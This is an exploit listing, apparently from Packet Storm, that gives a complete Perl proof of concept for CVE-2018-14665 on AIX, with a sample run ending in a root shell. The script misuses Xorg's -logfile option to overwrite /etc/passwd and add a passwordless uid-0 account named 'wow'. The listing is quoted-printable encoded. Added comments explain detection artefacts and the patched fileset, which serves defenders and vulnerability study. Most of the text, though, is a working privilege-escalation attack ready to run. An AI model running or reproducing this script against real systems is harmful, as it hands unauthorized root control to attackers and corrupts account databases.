
Xorg X11 Server (AIX) Local Privilege Escalation

2018-12-05 00:00:00
0xdono
packetstormsecurity.com

0.024 Low

EPSS

Percentile

88.7%

`# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation  
# Date: 29/11/2018  
# Exploit Author: @0xdono  
# Original Discovery and Exploit: Narendra Shinde  
# Vendor Homepage: https://www.x.org/  
# Platform: AIX  
# Version: X Window System Version 7.1.1  
# Fileset: X11.base.rte < 7.1.5.32  
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)  
# CVE: CVE-2018-14665  
#  
# Explanation:  
# Incorrect command-line parameter validation in the Xorg X server can  
# lead to privilege elevation and/or arbitrary files overwrite, when the  
# X server is running with elevated privileges.  
# The -logfile argument can be used to overwrite arbitrary files in the  
# file system, due to incorrect checks in the parsing of the option.  
#  
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.  
# It overwrites /etc/passwd in order to create a new user with root privileges.  
# All currently logged-in users need to be included when /etc/passwd is overwritten,  
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.  
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,  
# and is replaced by '-config'.  
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.  
#  
# IBM has not yet released a patch as of 29/11/2018.  
#  
# See also:  
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html  
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html  
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl  
#  
# Usage:  
# $ oslevel -s  
# 7100-04-00-0000  
# $ Xorg -version  
#  
# X Window System Version 7.1.1  
# Release Date: 12 May 2006  
# X Protocol Version 11, Revision 0, Release 7.1.1  
# Build Operating System: AIX IBM  
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00  
# Build Date: 07 July 2006  
# Before reporting problems, check http://wiki.x.org  
# to make sure that you have the latest version.  
# Module Loader present  
# $ id  
# uid=16500(nmyo) gid=1(staff)  
# $ perl aixxorg.pl  
# [+] AIX X11 server local root exploit  
# [-] Checking for Xorg and ksh93  
# [-] Opening /etc/passwd  
# [-] Retrieving currently logged in users  
# [-] Generating Xorg command  
# [-] Opening /tmp/wow.ksh  
# [-] Writing Xorg command to /tmp/wow.ksh  
# [-] Backing up /etc/passwd to /tmp/passwd.backup  
# [-] Making /tmp/wow.ksh executable  
# [-] Executing /tmp/wow.ksh  
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh  
# [-] Done  
# [+] 'su wow' for root shell  
# $ su wow  
# # id  
# uid=0(root) gid=0(system)  
# # whoami  
# root  
  
#!/usr/bin/perl  
# NOTE(review): this is the published CVE-2018-14665 proof of concept for AIX, kept  
# byte-for-byte as the listing shows it. The listing is quoted-printable mangled:  
# "=3D" stands for "=", "=20" for a trailing space, "=09" for a tab, and a bare "="  
# at the end of a line is a soft line wrap. The comments added below are for  
# defenders reading the page: which files the script reads, writes and leaves  
# behind, and what the header says the fix is (X11.base.rte 7.1.5.32 or later;  
# a setuid Xorg that accepts -logfile from an unprivileged user is the root cause).  
print "[+] AIX X11 server local root exploit\n";  
  
# Check Xorg is in path  
# Both prerequisites are located via `command -v`; the script exits if either  
# Xorg or ksh93 is missing from PATH.  
print "[-] Checking for Xorg and ksh93 \n";  
chomp($xorg =3D `command -v Xorg`);  
if ($xorg eq ""){=20  
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";  
exit;  
}  
  
# Check ksh93 is in path  
chomp($ksh =3D `command -v ksh93`);  
if ($ksh eq ""){  
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";  
exit;  
}  
  
# Read in /etc/passwd  
# Read-only at this point; /etc/passwd is world-readable, so no privilege is needed.  
print "[-] Opening /etc/passwd \n";  
open($passwd_fh, '<', "/etc/passwd");  
chomp(@passwd_array =3D <$passwd_fh>);  
close($passwd_fh);  
  
# Retrieve currently logged in users  
# `who` is consulted so that the replacement passwd content keeps the entries of  
# everyone currently logged in (the header explains the LOGNAME failure otherwise).  
print "[-] Retrieving currently logged in users \n";  
@users =3D `who | cut -d' ' -f1 | sort | uniq`;  
chomp(@users);  
  
# For all logged in users, add their current passwd entry to string  
# that will be used to overwrite passwd  
# Only lines whose "user:" prefix matches a logged-in user are kept; everything  
# else in /etc/passwd is dropped from the overwritten copy until the restore below.  
$users_logged_in_passwd =3D '';  
foreach my $user (@users)  
{  
$user .=3D ":";  
foreach my $line (@passwd_array)  
{  
if (index($line, $user) =3D=3D 0) {  
$users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=  
ine;  
}  
}  
}  
  
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log  
# The -config value is what Xorg echoes into its log file; with -logfile pointed at  
# ../etc/passwd (see the line written to /tmp/wow.ksh below), that log output is  
# what ends up in the password database. The appended entry is a uid-0 "wow" user  
# with an empty password field and /usr/bin/ksh as its shell.  
print "[-] Generating Xorg command \n";  
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=  
r/bin/ksh\n#' . '\'';  
  
# Detection: /tmp/wow.ksh is an on-disk artefact. It is a two-line ksh93 script whose  
# only command is Xorg with "-logfile ../etc/passwd" and display ":1". Xorg being  
# started by a non-root user with a -logfile outside its normal log directory is  
# itself worth alerting on, independent of this particular script.  
print "[-] Opening /tmp/wow.ksh \n";=09=09  
open($fr, '>', "/tmp/wow.ksh");  
  
# Use ksh93 for ANSI-C quoting  
print "[-] Writing Xorg command to /tmp/wow.ksh \n";  
print $fr '#!' . "$ksh\n";  
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";  
close $fr;  
  
# Backup passwd  
# Second artefact: /tmp/passwd.backup, a verbatim copy of the pre-exploitation  
# /etc/passwd. Its presence (or a recent mtime on it) is a useful forensic indicator.  
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";  
system("cp /etc/passwd /tmp/passwd.backup");  
  
# Make script executable and run it  
# Neither system() return value is checked; the script proceeds to the restore step  
# regardless of whether the Xorg run succeeded.  
print "[-] Making /tmp/wow.ksh executable \n";  
system("chmod +x /tmp/wow.ksh");  
print "[-] Executing /tmp/wow.ksh \n";  
system("/tmp/wow.ksh");  
  
# Replace overwritten passwd with: original passwd + wow user  
# The restore runs via `su wow`, i.e. it already depends on the uid-0 entry having  
# landed in /etc/passwd. The persistent indicator after cleanup is the single line  
# "wow::0:0::/:/usr/bin/ksh" appended to /etc/passwd; /tmp/wow.ksh is removed here,  
# but /tmp/passwd.backup is not. The "=" after "0:0" is a soft line wrap in the listing.  
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";  
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=  
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;  
  
print "[-] Done \n";  
print "[+] 'su wow' for root shell \n";  
  
  
`